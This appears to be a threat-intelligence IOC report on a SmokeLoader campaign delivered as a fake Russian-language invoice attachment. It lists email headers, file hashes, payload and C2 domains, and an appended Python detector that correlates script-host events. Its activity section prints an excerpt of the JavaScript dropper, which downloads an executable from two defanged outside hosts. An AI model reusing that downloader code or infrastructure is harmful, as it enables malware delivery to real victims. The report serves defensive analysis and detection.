#IOC #OptiData #VR #smokeloader #WSH #LZH
https://pastebin.com/b8PkhMyN

previous contact:
https://pastebin.com/hkskwKvc
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\*.exe

email_headers
--------------
Received: from mx.fm.ukrtelecom.ua (mx.fm.ukrtelecom.ua [82.207.79.108])
by srv8.victim1.com for <user0@org7.victim1.com>;
Fri, 11 Jan 2019 03:25:51 +0200 (EET) (envelope-from zagviddil@ukrpost.ua)
Received: from mail5.ukrpost.ua (mail5.ukrpost.ua [82.207.79.5]) by mx.fm.ukrtelecom.ua
Received: from [37.120.146.92] (helo=37.120.146.92)
by mail5.ukrpost.ua (envelope-from <zagviddil@ukrpost.ua>)
From: "Иван Богданович <zagviddil@ukrpost.ua>"
Subject: Счет фактура за текущий месяц
To: "user0" <user0@org7.victim1.com>
Reply-To: "Иван Богданович <zagviddil@ukrpost.ua>" <inter4room@ukr.net>

files
--------------
SHA-256 ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd
File name Счета по текущему 11.01.2019.lzh [LHarc 1.x/ARX archive data [lh0]]
File size 42 KB

SHA-256 3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a
File name Pax. 052-2019.ods [OpenDocument Spreadsheet]
File size 15.71 KB

SHA-256 69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c
File name Pax. 052-2019.js [ASCII text]
File size 26.21 KB

SHA-256 fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a
File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 205 KB

activity
**************
dropper_script:

    wsh = new ActiveXObject("wscript.shell");
    path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
    HTTP = new ActiveXObject("MSXML2.XMLHTTP"); Stream = new ActiveXObject("ADODB.Stream");
    HTTP.Open("GET", "musicaustriallc{.} ru/instadoc/liter.exe", false);
    ...
    else { HTTP.Open("GET", "telemagistralinc{.} info/instadoc/liter.exe", false);
    ...

PL musicaustriallc{.} ru/instadoc/liter.exe
   telemagistralinc{.} info/instadoc/liter.exe
C2 aviatorssm{.} bit/

netwrk
--------------
176.53.161.28 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/4.0
This program cannot be run in DOS mode.

comp
--------------
wscript.exe 968 TCP 176.53.161.28 80 ESTABLISHED

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 052-2019.js"
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe

persist
--------------
n/a (detects vm, sleeps)

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe
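A defender-side correlation check for the chain above (proc > netwrk > drop), added here as an example and not part of the original IOC note. The telemetry lines are constructed in a simple pipe-separated format modelled on the observations in this note; field layout, rule names and the threshold are assumptions.

```python
import re

# Constructed sample telemetry: kind|pid|image|detail (modelled on the note's proc/comp/drop entries).
# PID 968 reproduces the observed chain; PID 1204 is a benign logon script for contrast.
SAMPLE_EVENTS = [
    'proc|968|C:\\Windows\\System32\\WScript.exe|"C:\\Windows\\System32\\WScript.exe" "C:\\Users\\operator\\Desktop\\Pax. 052-2019.js"',
    'net|968|C:\\Windows\\System32\\WScript.exe|TCP 176.53.161.28:80 ESTABLISHED',
    'file|968|C:\\Windows\\System32\\WScript.exe|C:\\Users\\operator\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\250221.exe',
    'proc|1204|C:\\Windows\\System32\\WScript.exe|"C:\\Windows\\System32\\WScript.exe" "C:\\Scripts\\logon.vbs"',
    'file|1204|C:\\Windows\\System32\\WScript.exe|C:\\Users\\operator\\AppData\\Local\\Temp\\logon.txt',
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Script launched from a user-writable folder (where mail attachments end up).
USER_SCRIPT_DIR = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\"?$", re.I)
# PE written into the Templates folder, the drop location used by this dropper.
TEMPLATES_PE = re.compile(r"\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\[^\\]+\.exe$", re.I)

def parse(line):
    kind, pid, image, detail = line.split("|", 3)
    return {"kind": kind, "pid": int(pid), "image": image, "detail": detail}

def score_events(lines):
    """Per script-host PID, collect which of the three chain indicators were seen."""
    per_pid = {}
    for ev in map(parse, lines):
        if not ev["image"].lower().endswith(SCRIPT_HOSTS):
            continue
        flags = per_pid.setdefault(ev["pid"], set())
        if ev["kind"] == "proc" and USER_SCRIPT_DIR.search(ev["detail"]) and SCRIPT_EXT.search(ev["detail"]):
            flags.add("user_script")
        elif ev["kind"] == "net" and " ESTABLISHED" in ev["detail"]:
            flags.add("outbound")
        elif ev["kind"] == "file" and TEMPLATES_PE.search(ev["detail"]):
            flags.add("templates_pe")
    return {pid: sorted(f) for pid, f in per_pid.items()}

def alerts(lines, threshold=2):
    """PIDs showing at least `threshold` indicators; a single indicator alone is too noisy to alert on."""
    return sorted(pid for pid, f in score_events(lines).items() if len(f) >= threshold)

if __name__ == "__main__":
    print(score_events(SAMPLE_EVENTS), alerts(SAMPLE_EVENTS))
```

Any single indicator (a script host with a network connection, say) is common on its own; the value is in correlating the three on one PID.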
# # #
https://www.virustotal.com/#/file/ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd/details
https://www.virustotal.com/#/file/3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a/details
https://www.virustotal.com/#/file/69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c/details
https://www.virustotal.com/#/url/e9094e4d3a4b8c94425d33c6c423fc5e7ad9aba7f45ab4931d215aadb7d9111d/details
https://www.virustotal.com/#/file/fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a/details
https://analyze.intezer.com/#/analyses/051ebb20-165d-40b6-923d-a6eb78c9cdb7

VR
@